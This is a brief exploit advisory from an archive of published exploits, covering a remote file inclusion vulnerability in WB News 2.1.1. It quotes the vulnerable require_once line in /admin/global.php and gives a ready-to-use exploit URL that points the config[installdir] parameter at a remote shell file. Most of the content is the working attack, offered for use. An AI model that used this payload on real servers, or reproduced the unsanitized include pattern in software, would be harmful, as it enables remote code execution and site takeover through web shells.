WB News 2.1.1 config[installdir] Remote File Inclusion Vulnerability

2009-02-09T00:00:00
ID 1337DAY-ID-4828
Type zdt
Reporter ahmadbady
Modified 2009-02-09T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
WB News 2.1.1 config[installdir] Remote File Inclusion Vulnerability
====================================================================


-----------------:Remote File Include:-----------------
-------------------------------------------------------
script:wb news v2.1.1
    
------------------------------------------------------------------
download from:http://www.webmobo.com/downloads/
   
------------------------------------------------------------------

.......................................................
vul: /admin/global.php line 32;

  
require_once( $config["installdir"] . "/includes/constants.php" );

------------------------------------------------------
-----------------------------------------------------

xpl:

http://127.0.0.1/admin/global.php?config[installdir]=shell.txt?

***************************************************



#  0day.today [2018-01-04]  #